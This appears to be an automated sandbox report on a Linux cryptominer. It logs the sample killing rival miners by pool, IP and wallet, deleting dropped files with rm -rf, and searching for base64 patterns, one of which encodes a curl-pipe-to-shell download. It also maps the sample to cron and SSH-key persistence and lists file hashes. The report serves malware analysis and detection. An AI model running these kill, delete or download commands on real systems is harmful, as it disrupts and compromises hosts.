- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1529
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1528
- /bin/grep
  grep 144.217.45.45
  2⤵
  PID:1527
- /bin/grep
  grep -v grep
  2⤵
  PID:1526
- /bin/ps
  ps aux
  2⤵
  PID:1525
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1534
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1533
- /bin/grep
  grep 107.174.47.181
  2⤵
  PID:1532
- /bin/grep
  grep -v grep
  2⤵
  PID:1531
- /bin/ps
  ps aux
  2⤵
  PID:1530
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1539
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1538
- /bin/grep
  grep 176.31.6.16
  2⤵
  PID:1537
- /bin/grep
  grep -v grep
  2⤵
  PID:1536
- /bin/ps
  ps aux
  2⤵
  PID:1535
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1544
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1543
- /bin/grep
  grep mine.moneropool.com
  2⤵
  PID:1542
- /bin/grep
  grep -v grep
  2⤵
  PID:1541
- /bin/ps
  ps auxf
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1540
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1549
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1548
- /bin/grep
  grep pool.t00ls.ru
  2⤵
  PID:1547
- /bin/grep
  grep -v grep
  2⤵
  PID:1546
- /bin/ps
  ps auxf
  2⤵
  PID:1545
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1554
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1553
- /bin/grep
  grep xmr.crypto-pool.fr:8080
  2⤵
  PID:1552
- /bin/grep
  grep -v grep
  2⤵
  PID:1551
- /bin/ps
  ps auxf
  2⤵
  - Reads runtime system information
  PID:1550
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1559
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1558
- /bin/grep
  grep xmr.crypto-pool.fr:3333
  2⤵
  PID:1557
- /bin/grep
  grep -v grep
  2⤵
  PID:1556
- /bin/ps
  ps auxf
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1555
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1564
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1563
- /bin/grep
  grep "[email protected]"
  2⤵
  PID:1562
- /bin/grep
  grep -v grep
  2⤵
  PID:1561
- /bin/ps
  ps auxf
  2⤵
  PID:1560
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1569
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1568
- /bin/grep
  grep monerohash.com
  2⤵
  PID:1567
- /bin/grep
  grep -v grep
  2⤵
  PID:1566
- /bin/ps
  ps auxf
  2⤵
  - Reads runtime system information
  PID:1565
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1574
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1573
- /bin/grep
  grep /tmp/a7b104c270
  2⤵
  PID:1572
- /bin/grep
  grep -v grep
  2⤵
  PID:1571
- /bin/ps
  ps auxf
  2⤵
  - Reads CPU attributes
  PID:1570
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1579
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1578
- /bin/grep
  grep xmr.crypto-pool.fr:6666
  2⤵
  PID:1577
- /bin/grep
  grep -v grep
  2⤵
  PID:1576
- /bin/ps
  ps auxf
  2⤵
  PID:1575
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1584
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1583
- /bin/grep
  grep xmr.crypto-pool.fr:7777
  2⤵
  PID:1582
- /bin/grep
  grep -v grep
  2⤵
  PID:1581
- /bin/ps
  ps auxf
  2⤵
  PID:1580
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1589
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1588
- /bin/grep
  grep xmr.crypto-pool.fr:443
  2⤵
  PID:1587
- /bin/grep
  grep -v grep
  2⤵
  PID:1586
- /bin/ps
  ps auxf
  2⤵
  - Reads CPU attributes
  PID:1585
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1594
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1593
- /bin/grep
  grep stratum.f2pool.com:8888
  2⤵
  PID:1592
- /bin/grep
  grep -v grep
  2⤵
  PID:1591
- /bin/ps
  ps auxf
  2⤵
  PID:1590
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1599
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1598
- /bin/grep
  grep xmrpool.eu
  2⤵
  PID:1597
- /bin/grep
  grep -v grep
  2⤵
  PID:1596
- /bin/ps
  ps auxf
  2⤵
  - Reads CPU attributes
  PID:1595
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1604
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1603
- /bin/grep
  grep kieuanilam.me
  2⤵
  PID:1602
- /bin/grep
  grep -v grep
  2⤵
  PID:1601
- /bin/ps
  ps auxf
  2⤵
  PID:1600
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1608
- - /usr/local/sbin/kill
    kill -9 1606
    3⤵
    PID:1609
- - /usr/local/bin/kill
    kill -9 1606
    3⤵
    PID:1609
- - /usr/sbin/kill
    kill -9 1606
    3⤵
    PID:1609
- - /usr/bin/kill
    kill -9 1606
    3⤵
    PID:1609
- - /sbin/kill
    kill -9 1606
    3⤵
    PID:1609
- - /bin/kill
    kill -9 1606
    3⤵
    PID:1609
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1607
- /bin/grep
  grep xiaoyao
  2⤵
  PID:1606
- /bin/ps
  ps auxf
  2⤵
  PID:1605
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1613
- - /usr/local/sbin/kill
    kill -9 1611
    3⤵
    PID:1614
- - /usr/local/bin/kill
    kill -9 1611
    3⤵
    PID:1614
- - /usr/sbin/kill
    kill -9 1611
    3⤵
    PID:1614
- - /usr/bin/kill
    kill -9 1611
    3⤵
    PID:1614
- - /sbin/kill
    kill -9 1611
    3⤵
    PID:1614
- - /bin/kill
    kill -9 1611
    3⤵
    PID:1614
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1612
- /bin/grep
  grep xiaoxue
  2⤵
  PID:1611
- /bin/ps
  ps auxf
  2⤵
  PID:1610
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1618
- /bin/grep
  grep "ESTABLISHED\\|SYN_SENT"
  2⤵
  PID:1617
- /bin/grep
  grep 46.243.253.15
  2⤵
  PID:1616
- /bin/sed
  sed -e "s/\\/.*//g"
  2⤵
  PID:1619
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1620
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1626
- /bin/sed
  sed -e "s/\\/.*//g"
  2⤵
  PID:1625
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1624
- /bin/grep
  grep "ESTABLISHED\\|SYN_SENT"
  2⤵
  PID:1623
- /bin/grep
  grep 176.31.6.16
  2⤵
  PID:1622
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1628
- /usr/bin/pgrep
  pgrep -f monerohash
  2⤵
  PID:1627
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1630
- /usr/bin/pgrep
  pgrep -f L2Jpbi9iYXN
  2⤵
  PID:1629
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1632
- /usr/bin/pgrep
  pgrep -f xzpauectgr
  2⤵
  PID:1631
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1634
- /usr/bin/pgrep
  pgrep -f slxfbkmxtd
  2⤵
  - Reads CPU attributes
  PID:1633
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1636
- /usr/bin/pgrep
  pgrep -f mixtape
  2⤵
  PID:1635
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1638
- /usr/bin/pgrep
  pgrep -f addnj
  2⤵
  PID:1637
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1640
- /usr/bin/pgrep
  pgrep -f 200.68.17.196
  2⤵
  - Reads CPU attributes
  PID:1639
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1642
- /usr/bin/pgrep
  pgrep -f IyEvYmluL3NoCgpzUG
  2⤵
  PID:1641
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1644
- /usr/bin/pgrep
  pgrep -f KHdnZXQgLXFPLSBodHRw
  2⤵
  PID:1643
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1646
- /usr/bin/pgrep
  pgrep -f FEQ3eSp8omko5nx9e97hQ39NS3NMo6rxVQS3
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1645
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1648
- /usr/bin/pgrep
  pgrep -f Y3VybCAxOTEuMTAxLjE4MC43Ni9saW4udHh0IHxzaAo
  2⤵
  PID:1647
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1650
- /usr/bin/pgrep
  pgrep -f mwyumwdbpq.conf
  2⤵
  - Reads runtime system information
  PID:1649
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1652
- /usr/bin/pgrep
  pgrep -f honvbsasbf.conf
  2⤵
  PID:1651
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1654
- /usr/bin/pgrep
  pgrep -f mqdsflm.cf
  2⤵
  - Reads CPU attributes
  PID:1653
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1656
- /usr/bin/pgrep
  pgrep -f stratum
  2⤵
  PID:1655
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1658
- /usr/bin/pgrep
  pgrep -f lower.sh
  2⤵
  PID:1657
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1660
- /usr/bin/pgrep
  pgrep -f ./ppp
  2⤵
  PID:1659
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1662
- /usr/bin/pgrep
  pgrep -f cryptonight
  2⤵
  PID:1661
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1664
- /usr/bin/pgrep
  pgrep -f ./seervceaess
  2⤵
  PID:1663
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1666
- /usr/bin/pgrep
  pgrep -f ./servceaess
  2⤵
  PID:1665
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1668
- /usr/bin/pgrep
  pgrep -f ./servceas
  2⤵
  PID:1667
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1670
- /usr/bin/pgrep
  pgrep -f ./servcesa
  2⤵
  - Reads CPU attributes
  PID:1669
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1672
- /usr/bin/pgrep
  pgrep -f ./vsp
  2⤵
  - Reads CPU attributes
  PID:1671
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1674
- /usr/bin/pgrep
  pgrep -f ./jvs
  2⤵
  PID:1673
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1676
- /usr/bin/pgrep
  pgrep -f ./pvv
  2⤵
  PID:1675
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1678
- /usr/bin/pgrep
  pgrep -f ./vpp
  2⤵
  PID:1677
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1680
- /usr/bin/pgrep
  pgrep -f ./pces
  2⤵
  PID:1679
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1682
- /usr/bin/pgrep
  pgrep -f ./rspce
  2⤵
  PID:1681
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1684
- /usr/bin/pgrep
  pgrep -f ./haveged
  2⤵
  - Reads runtime system information
  PID:1683
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1686
- /usr/bin/pgrep
  pgrep -f ./jiba
  2⤵
  - Reads runtime system information
  PID:1685
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1688
- /usr/bin/pgrep
  pgrep -f ./watchbog
  2⤵
  - Reads CPU attributes
  PID:1687
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1690
- /usr/bin/pgrep
  pgrep -f ./A7mA5gb
  2⤵
  PID:1689
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1692
- /usr/bin/pgrep
  pgrep -f kacpi_svc
  2⤵
  PID:1691
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1694
- /usr/bin/pgrep
  pgrep -f kswap_svc
  2⤵
  - Reads runtime system information
  PID:1693
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1696
- /usr/bin/pgrep
  pgrep -f kauditd_svc
  2⤵
  PID:1695
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1698
- /usr/bin/pgrep
  pgrep -f kpsmoused_svc
  2⤵
  PID:1697
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1700
- /usr/bin/pgrep
  pgrep -f kseriod_svc
  2⤵
  PID:1699
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1702
- /usr/bin/pgrep
  pgrep -f kthreadd_svc
  2⤵
  PID:1701
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1704
- /usr/bin/pgrep
  pgrep -f ksoftirqd_svc
  2⤵
  PID:1703
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1706
- /usr/bin/pgrep
  pgrep -f kintegrityd_svc
  2⤵
  PID:1705
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1708
- /usr/bin/pgrep
  pgrep -f jawa
  2⤵
  PID:1707
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1710
- /usr/bin/pgrep
  pgrep -f oracle.jpg
  2⤵
  PID:1709
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1712
- /usr/bin/pgrep
  pgrep -f 45cToD1FzkjAxHRBhYKKLg5utMGEN
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1711
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1714
- /usr/bin/pgrep
  pgrep -f 188.209.49.54
  2⤵
  PID:1713
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1716
- /usr/bin/pgrep
  pgrep -f 181.214.87.241
  2⤵
  PID:1715
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1718
- /usr/bin/pgrep
  pgrep -f etnkFgkKMumdqhrqxZ6729U7bY8pzRjYzGbXa5sDQ
  2⤵
  PID:1717
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1720
- /usr/bin/pgrep
  pgrep -f 47TdedDgSXjZtJguKmYqha4sSrTvoPXnrYQEq2Lbj
  2⤵
  PID:1719
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1722
- /usr/bin/pgrep
  pgrep -f etnkP9UjR55j9TKyiiXWiRELxTS51FjU9e1UapXyK
  2⤵
  PID:1721
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1724
- /usr/bin/pgrep
  pgrep -f servim
  2⤵
  PID:1723
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1726
- /usr/bin/pgrep
  pgrep -f kblockd_svc
  2⤵
  PID:1725
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1728
- /usr/bin/pgrep
  pgrep -f native_svc
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1727
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1730
- /usr/bin/pgrep
  pgrep -f ynn
  2⤵
  PID:1729
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1732
- /usr/bin/pgrep
  pgrep -f 65ccEJ7
  2⤵
  - Reads CPU attributes
  PID:1731
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1734
- /usr/bin/pgrep
  pgrep -f jmxx
  2⤵
  PID:1733
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1736
- /usr/bin/pgrep
  pgrep -f 2Ne80nA
  2⤵
  PID:1735
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1738
- /usr/bin/pgrep
  pgrep -f sysstats
  2⤵
  PID:1737
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1740
- /usr/bin/pgrep
  pgrep -f systemxlv
  2⤵
  - Reads runtime system information
  PID:1739
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1742
- /usr/bin/pgrep
  pgrep -f watchbog
  2⤵
  - Reads runtime system information
  PID:1741
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1744
- /usr/bin/pgrep
  pgrep -f OIcJi1m
  2⤵
  PID:1743
- /usr/bin/pkill
  pkill -f biosetjenkins
  2⤵
  PID:1745
- /usr/bin/pkill
  pkill -f Loopback
  2⤵
  PID:1746
- /usr/bin/pkill
  pkill -f apaceha
  2⤵
  PID:1747
- /usr/bin/pkill
  pkill -f cryptonight
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1748
- /usr/bin/pkill
  pkill -f stratum
  2⤵
  PID:1749
- /usr/bin/pkill
  pkill -f mixnerdx
  2⤵
  - Reads CPU attributes
  PID:1750
- /usr/bin/pkill
  pkill -f performedl
  2⤵
  - Reads CPU attributes
  PID:1751
- /usr/bin/pkill
  pkill -f JnKihGjn
  2⤵
  - Reads CPU attributes
  PID:1752
- /usr/bin/pkill
  pkill -f irqba2anc1
  2⤵
  - Reads CPU attributes
  PID:1753
- /usr/bin/pkill
  pkill -f irqba5xnc1
  2⤵
  PID:1754
- /usr/bin/pkill
  pkill -f irqbnc1
  2⤵
  - Reads CPU attributes
  PID:1755
- /usr/bin/pkill
  pkill -f ir29xc1
  2⤵
  PID:1756
- /usr/bin/pkill
  pkill -f conns
  2⤵
  - Reads runtime system information
  PID:1757
- /usr/bin/pkill
  pkill -f irqbalance
  2⤵
  PID:1758
- /usr/bin/pkill
  pkill -f crypto-pool
  2⤵
  - Reads CPU attributes
  PID:1759
- /usr/bin/pkill
  pkill -f XJnRj
  2⤵
  PID:1760
- /usr/bin/pkill
  pkill -f mgwsl
  2⤵
  - Reads runtime system information
  PID:1761
- /usr/bin/pkill
  pkill -f pythno
  2⤵
  PID:1762
- /usr/bin/pkill
  pkill -f jweri
  2⤵
  PID:1763
- /usr/bin/pkill
  pkill -f lx26
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1764
- /usr/bin/pkill
  pkill -f NXLAi
  2⤵
  PID:1765
- /usr/bin/pkill
  pkill -f BI5zj
  2⤵
  - Reads CPU attributes
  PID:1766
- /usr/bin/pkill
  pkill -f askdljlqw
  2⤵
  PID:1767
- /usr/bin/pkill
  pkill -f minerd
  2⤵
  PID:1768
- /usr/bin/pkill
  pkill -f minergate
  2⤵
  PID:1769
- /usr/bin/pkill
  pkill -f Guard.sh
  2⤵
  PID:1770
- /usr/bin/pkill
  pkill -f ysaydh
  2⤵
  PID:1771
- /usr/bin/pkill
  pkill -f bonns
  2⤵
  PID:1772
- /usr/bin/pkill
  pkill -f donns
  2⤵
  PID:1773
- /usr/bin/pkill
  pkill -f kxjd
  2⤵
  - Reads CPU attributes
  PID:1774
- /usr/bin/pkill
  pkill -f Duck.sh
  2⤵
  PID:1775
- /usr/bin/pkill
  pkill -f bonn.sh
  2⤵
  - Reads CPU attributes
  PID:1776
- /usr/bin/pkill
  pkill -f conn.sh
  2⤵
  - Reads CPU attributes
  PID:1777
- /usr/bin/pkill
  pkill -f kworker34
  2⤵
  - Reads CPU attributes
  PID:1778
- /usr/bin/pkill
  pkill -f kw.sh
  2⤵
  PID:1779
- /usr/bin/pkill
  pkill -f pro.sh
  2⤵
  - Reads runtime system information
  PID:1780
- /usr/bin/pkill
  pkill -f polkitd
  2⤵
  - Reads runtime system information
  PID:1781
- /usr/bin/pkill
  pkill -f acpid
  2⤵
  PID:1782
- /usr/bin/pkill
  pkill -f icb5o
  2⤵
  PID:1783
- /usr/bin/pkill
  pkill -f nopxi
  2⤵
  - Reads CPU attributes
  PID:1784
- /usr/bin/pkill
  pkill -f irqbalanc1
  2⤵
  PID:1785
- /usr/bin/pkill
  pkill -f minerd
  2⤵
  - Reads CPU attributes
  PID:1786
- /usr/bin/pkill
  pkill -f i586
  2⤵
  - Reads runtime system information
  PID:1787
- /usr/bin/pkill
  pkill -f gddr
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1788
- /usr/bin/pkill
  pkill -f mstxmr
  2⤵
  PID:1789
- /usr/bin/pkill
  pkill -f ddg.2011
  2⤵
  - Reads CPU attributes
  PID:1790
- /usr/bin/pkill
  pkill -f wnTKYg
  2⤵
  PID:1791
- /usr/bin/pkill
  pkill -f deamon
  2⤵
  - Reads CPU attributes
  PID:1792
- /usr/bin/pkill
  pkill -f disk_genius
  2⤵
  - Reads runtime system information
  PID:1793
- /usr/bin/pkill
  pkill -f sourplum
  2⤵
  - Reads CPU attributes
  PID:1794
- /usr/bin/pkill
  pkill -f polkitd
  2⤵
  - Reads runtime system information
  PID:1795
- /usr/bin/pkill
  pkill -f nanoWatch
  2⤵
  PID:1796
- /usr/bin/pkill
  pkill -f zigw
  2⤵
  - Reads runtime system information
  PID:1797
- /usr/bin/pkill
  pkill -f devtool
  2⤵
  PID:1798
- /usr/bin/pkill
  pkill -f devtools
  2⤵
  PID:1799
- /usr/bin/pkill
  pkill -f systemctI
  2⤵
  PID:1800
- /usr/bin/pkill
  pkill -f watchbog
  2⤵
  PID:1801
- /usr/bin/pkill
  pkill -f cryptonight
  2⤵
  PID:1802
- /usr/bin/pkill
  pkill -f sustes
  2⤵
  PID:1803
- /usr/bin/pkill
  pkill -f xmrig
  2⤵
  PID:1804
- /usr/bin/pkill
  pkill -f xmrig-cpu
  2⤵
  PID:1805
- /usr/bin/pkill
  pkill -f 121.42.151.137
  2⤵
  PID:1806
- /usr/bin/pkill
  pkill -f init12.cfg
  2⤵
  - Reads CPU attributes
  PID:1807
- /usr/bin/pkill
  pkill -f nginxk
  2⤵
  - Reads CPU attributes
  PID:1808
- /usr/bin/pkill
  pkill -f tmp/wc.conf
  2⤵
  PID:1809
- /usr/bin/pkill
  pkill -f xmrig-notls
  2⤵
  PID:1810
- /usr/bin/pkill
  pkill -f xmr-stak
  2⤵
  PID:1811
- /usr/bin/pkill
  pkill -f suppoie
  2⤵
  PID:1812
- /usr/bin/pkill
  pkill -f zer0day.ru
  2⤵
  PID:1813
- /usr/bin/pkill
  pkill -f dbus-daemon--system
  2⤵
  - Reads runtime system information
  PID:1814
- /usr/bin/pkill
  pkill -f nullcrew
  2⤵
  PID:1815
- /usr/bin/pkill
  pkill -f systemctI
  2⤵
  PID:1816
- /usr/bin/pkill
  pkill -f kworkerds
  2⤵
  PID:1817
- /usr/bin/pkill
  pkill -f init10.cfg
  2⤵
  PID:1818
- /usr/bin/pkill
  pkill -f /wl.conf
  2⤵
  - Reads CPU attributes
  PID:1819
- /usr/bin/pkill
  pkill -f crond64
  2⤵
  PID:1820
- /usr/bin/pkill
  pkill -f sustse
  2⤵
  - Reads runtime system information
  PID:1821
- /usr/bin/pkill
  pkill -f vmlinuz
  2⤵
  PID:1822
- /usr/bin/pkill
  pkill -f exin
  2⤵
  - Reads runtime system information
  PID:1823
- /usr/bin/pkill
  pkill -f apachiii
  2⤵
  PID:1824
- /usr/bin/pkill
  pkill -f networkservics
  2⤵
  PID:1825
- /bin/rm
  rm -rf /usr/bin/config.json
  2⤵
  PID:1826
- /bin/rm
  rm -rf /usr/bin/exin
  2⤵
  PID:1827
- /bin/rm
  rm -rf /tmp/wc.conf
  2⤵
  PID:1828
- /bin/rm
  rm -rf /tmp/log_rot
  2⤵
  PID:1829
- /bin/rm
  rm -rf /tmp/apachiii
  2⤵
  PID:1830
- /bin/rm
  rm -rf /tmp/sustse
  2⤵
  PID:1831
- /bin/rm
  rm -rf /tmp/php
  2⤵
  PID:1832
- /bin/rm
  rm -rf /tmp/p2.conf
  2⤵
  PID:1833
- /bin/rm
  rm -rf /tmp/pprt
  2⤵
  PID:1834
- /bin/rm
  rm -rf /tmp/ppol
  2⤵
  PID:1835
- /bin/rm
  rm -rf /tmp/javax/config.sh
  2⤵
  PID:1836
- /bin/rm
  rm -rf /tmp/javax/sshd2
  2⤵
  PID:1837
- /bin/rm
  rm -rf /tmp/.profile
  2⤵
  PID:1838

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Cron

T1053.003

Persistence

Account Manipulation

T1098

SSH Authorized Keys

T1098.004

Scheduled Task/Job

T1053

Cron

T1053.003

Privilege Escalation

Account Manipulation

T1098

SSH Authorized Keys

T1098.004

Scheduled Task/Job

T1053

Cron

T1053.003

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/etc/sysupdatas

Filesize
2B

MD5
b026324c6904b2a9cb4b88d6d61c81d1

SHA1
e5fa44f2b31c1fb553b6021e7360d07d5d91ff5e

SHA256
4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865

SHA512
3abb6677af34ac57c0ca5828fd94f9d886c26ce59a8ce60ecf6778079423dccff1d6f19cb655805d56098e6d38a1a710dee59523eed7511e5a9e4b8ccb3a4686

Download Submit
/etc/sysupdatas

Filesize
9B

MD5
970d39f8690eff0fe573e7bcf51bda9b

SHA1
46f8f835d3d3d41f063d0e8346260bb622b01a3f

SHA256
7e3735835710cbbb54a0bee4a323c83c54cb1f4f60463b9cf88006946fe2b9a5

SHA512
24952be3e8e47ffb4ee83d55f513edf041f6c4e420e2f52bdbdf0daee4c5735ad3ee5ed863f95ffa931a70d551590a7fe6ae67dc22f32060793e2525e4b56cd0

Download Submit
/var/spool/cron/crontabs/tmp.EBQZPV

Filesize
222B

MD5
b75f1f39ed3486a5be498544887c44f2

SHA1
60be1dd69c88b1031300500fce46ff0b102407cc

SHA256
7ccf561f3770c4f05693fcd115ead993be4e4e5273792225c41e2c63c74b58ec

SHA512
368a4e8cd61786dad12565322ca750fa6de9ff6571f123c5fd0a14ae703c2ce9a7767f2cf42e11a5e7ef0c30c911bf1ee8b6bcd0147d051f1d949cac786aee42

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads